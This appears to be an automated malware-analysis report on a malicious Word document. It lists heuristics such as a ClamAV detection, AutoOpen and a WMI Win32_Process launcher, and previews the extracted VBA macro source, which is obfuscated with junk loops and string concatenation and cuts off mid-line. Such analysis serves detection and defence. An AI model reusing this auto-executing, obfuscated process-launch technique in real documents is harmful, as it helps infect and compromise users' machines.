MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains legacy WordBasic auto-exec markers and a critical heuristic firing for VBA WMI Win32_Process launcher. This indicates the document is designed to execute arbitrary code via WMI. The GetObject call further supports the execution of external processes. The presence of these indicators strongly suggests a downloader or dropper functionality.
Heuristics 7
-
ClamAV: Doc.Malware.Smpowloadbb-6965612-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Smpowloadbb-6965612-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6747 bytes |
SHA-256: 46fafa4706f53f4aeb75609e9fa505701391a177d5089ba9b7d3844d8bf04b54 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Z74186"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "w22673"
Attribute VB_Base = "0{EE749F86-F1A1-404C-BADD-4CB7021EB7F0}{0730E178-EC20-41FD-809E-CFF6CC65A68C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "q25131_"
Attribute VB_Name = "p291855"
Attribute VB_Name = "p21593"
Attribute VB_Base = "0{81CF2846-C84D-44B3-B2A7-367212CCF2A7}{7CD0F323-4443-4284-8822-81079536DA65}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "a40085"
Function Q3353823(j1_0276)
While Z70179 And G188_5
'U08466G544319z38929p74509
'Q_9088Y_358_1i_203310t9_4743_
'A43344R707273L18817_2j826102
Wend
While Q75518 And M754993
'G3982_4N3_3720f281337W35874
'j_53710X7_1359R011729S3787336
'J120709O3984_O7545_J99_909
Wend
While H127_4 And c8161878
'b7246616X002234w4568490w9_641
'q7766214w4956036Z_8834a5717466
'r4548__a4239_5v_339393j6__8989
Wend
Set Q3353823 = CVar(j1_0276)
While A55618 And i40325_
'R026_984J611_92O72057r52165
'p2617929C83_51I13_8_0w1581332
'N866474q0_2_03r572__2S_519950
Wend
While k455_33 And h39438
'i_4909j94982F33503U0192497
'u2700743t086073h556651C5_9084
'M5817__L707192b826000a2__2811
Wend
While W37120_ And P4114092
'u077596_d6460_67k4_717l6_9512
'h237_225j25434c01693R_9134
'u56893Q7_443O978925l037893
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While Y0329034 And W903_3
'N_36534Q475_796w346169i36679_4
'X_922_w632988w52_70X00_71
'a97222A00666s7_04102i23646
Wend
While u8_7814 And V37718
'v60796v694834l70266B70756
'z5970231Z6362077R15113A9618680
'J749091b5__03z186855N598944
Wend
Call V0001425
While T7888_1 And B870974
'j_42075X96432S494747i74732
'A533813f8286662Q4_88_91h3798392
'R68_8_1E05135l64__5V24138
Wend
While F6396342 And b2_5321
'm9__6978h042143n9865367M298_1
'b91071a2_02_6G1368_h130252
'k09_37l4740386z989905_l499914
Wend
End Sub
Attribute VB_Name = "i971_9_"
Function V0001425()
On Error Resume Next
While G706634 And i_348413
'U780_61c638603D06475G540_031
'V8__53V538556m02143j7777_7
'r1326351f51_41M0_26_6O_068377
Wend
While z256034 And I3850_
'D7626388Y003987_w8_86599r08850
'V_89460u61004S80725_2d2300217
'I550_3Y6_760h04798P51_809
Wend
While o984308_ And v11298_
'w550_81n14645C85_1_q370632
'f5508722R15982M37_576Z086077
'c34130a555_807R8_0562u85501
Wend
t3239169 = w22673.c85765_.PasswordChar + p21593.s51328 + w22673.c85765_.ControlTipText + p21593.T9062956 + w22673.c85765_.ControlTipText + w22673.c85765_.ControlSource + p21593.N956516 + w22673.c85765_.ControlSource + w22673.c85765_.ControlSource + p21593.I36286 + w22673.c85765_.PasswordChar + p21593.p322885 + w22673.c85765_.ControlSource
While W5296121 And O1070_
'W7013950E73024B78_05X84558
'F6053548v8050618K59571c3955597
'A8416_S1904990p6031723N574_08
Wend
While j00389 And V_296494
'p_6001A_90306L80913G9012985
'T98_9449b83452Q6991_9S03268
'P53076S55678_3C18993z03_11
Wend
Set w03423 = Q3353823(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
While C357636 And w6127_
'f59652Q4270_w390864K_40165_
'A_181932n41753z61178O53097
's70781X01_085P__9_5s69__73
Wend
While b454240 And k60476
'd60048K33961_9o693591R8_628
'J09387E8507627I7412925N92139
'z2205341i96445w28_131S7570937
Wend
w03423.C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.